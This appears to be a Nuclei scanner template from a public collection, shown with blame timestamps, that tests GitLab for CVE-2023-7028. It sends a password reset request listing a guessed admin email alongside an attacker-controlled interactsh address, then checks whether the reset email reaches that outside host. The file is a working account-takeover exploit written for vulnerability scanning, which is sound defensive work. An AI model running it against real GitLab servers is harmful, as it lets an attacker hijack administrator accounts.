nuclei-templates/http/cves/2023/CVE-2023-7028.yaml

71 lines
2.2 KiB
YAML
Raw Normal View History

2024-01-14 07:28:32 +00:00
id: CVE-2023-7028
info:
2024-01-14 12:16:26 +00:00
name: GitLab - Account Takeover via Password Reset
2024-01-14 07:28:32 +00:00
author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
severity: critical
description: |
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
reference:
- https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
- https://x.com/rwincey/status/1745659710089437368?s=20
2024-01-14 12:16:26 +00:00
- https://gitlab.com/gitlab-org/gitlab/-/issues/436084
- https://hackerone.com/reports/2293343
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
cvss-score: 10
cve-id: CVE-2023-7028
cwe-id: CWE-284
2024-01-14 07:28:32 +00:00
metadata:
verified: true
max-request: 6
2024-01-14 07:28:32 +00:00
vendor: gitlab
product: gitlab
shodan-query: title:"Gitlab"
tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive
2024-01-14 07:28:32 +00:00
2024-01-26 12:39:32 +00:00
flow: http(1) && http(2)
2024-01-16 07:42:46 +00:00
2024-01-14 07:28:32 +00:00
http:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: token
group: 1
regex:
- name="authenticity_token" value="([A-Za-z0-9_-]+)"
internal: true
- raw:
- |
2024-01-14 12:16:26 +00:00
@timeout: 20s
2024-01-14 07:28:32 +00:00
POST /users/password HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/users/password/new
2024-01-14 12:16:26 +00:00
authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}
2024-01-14 07:28:32 +00:00
payloads:
username:
2024-01-14 12:16:26 +00:00
- admin@example.com
- admin@{{RDN}}
- root@{{RDN}}
- gitlab@{{RDN}}
- git@{{RDN}}
2024-01-14 07:28:32 +00:00
matchers:
- type: dsl
dsl:
2024-01-14 12:16:26 +00:00
- contains(interactsh_protocol, 'smtp')
extractors:
- type: dsl
dsl:
- username
# digest: 4b0a00483046022100dbde41dcc6559ec91567be6797c706a57bd1583110c48ddd1c452a0c3956d415022100e2ab15270a6b174c4fc748692a3dc49a36d2ac8e6b879868ee2e7aa55aef25cc:922c64590222798bb761d5b6d8e72950